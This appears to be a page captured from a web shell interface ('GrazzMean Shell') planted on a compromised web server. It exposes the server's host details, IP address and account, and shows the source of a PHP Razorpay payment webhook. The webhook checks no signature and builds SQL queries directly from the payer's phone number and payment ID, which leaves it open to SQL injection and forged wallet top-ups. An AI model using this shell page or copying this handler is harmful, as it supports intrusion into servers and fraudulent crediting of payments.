shell bypass 403

GrazzMean Shell

: /home/gutlooks/public_html/razzoor/ [ drwxr-xr-x ]
Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : roza_response.php
<?php
//   function __autoload($class)
//     {
//         include("../zebra_cross/admin_login/classess/".$class.".php");
//     }
    
    spl_autoload_register(function($class) {
   include("../zebra_cross/admin_login/classess/".$class.".php");
});
        
    $sqlfun = new sqlfunction();
    $admin = new admin_login();
    date_default_timezone_set("Asia/kolkata");
    $rawData = file_get_contents("php://input");
    
    
    $data = json_decode($rawData, true);

// Extract values
$paymentId = $data['payload']['payment']['entity']['id'];
$amount = $data['payload']['payment']['entity']['amount'];
$contact = $data['payload']['payment']['entity']['contact'];
$contactWithoutCode = preg_replace("/^\+91/", "", $contact);
$amountRupees = $amount / 100;
  $datta = array("gateway"=>"razorpay","result"=>$rawData,"method"=>$_SERVER['REQUEST_METHOD']);
    $sqlfun->ins_data("cashfree_status",$datta);
    
$check1 = $sqlfun->query("select * from player where p_mobile = '$contactWithoutCode'");
if($check1->rowCount() > 0){
$rows =$check1->fetch(PDO::FETCH_OBJ);
$p_id = $rows->p_id;
$p_f_name = $rows->p_f_name;

    //$order_id =  $_REQUEST['order_id'];
    $checkss = $sqlfun->query("select * from add_money_request where transaction_id = '$paymentId'");
//   $checkss = $sqlfun->query($sqls);
    if($checkss->rowCount() == 0)
    {
    
        $data = [
                    'transaction_id' => $paymentId,
                    'amount' => $amountRupees,
                    'name' => $p_f_name,
                    'mobile' => $contactWithoutCode,
                    'p_id' => $p_id
                ];
                
                // URL to hit
                $url = "https://gutlooks.com/payu/ad_m.php"; // Replace with your target URL
                
                // Initialize cURL session
                $ch = curl_init();
                
                // Configure cURL options
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_POST, true); // Use POST method
                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); // Attach data
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Receive server response
                curl_setopt($ch, CURLOPT_HTTPHEADER, [
                    'Content-Type: application/x-www-form-urlencoded' // Specify content type
                ]);
                
                // Execute cURL request
                $response = curl_exec($ch);
    }
    
}
    ?>
© 2026 GrazzMean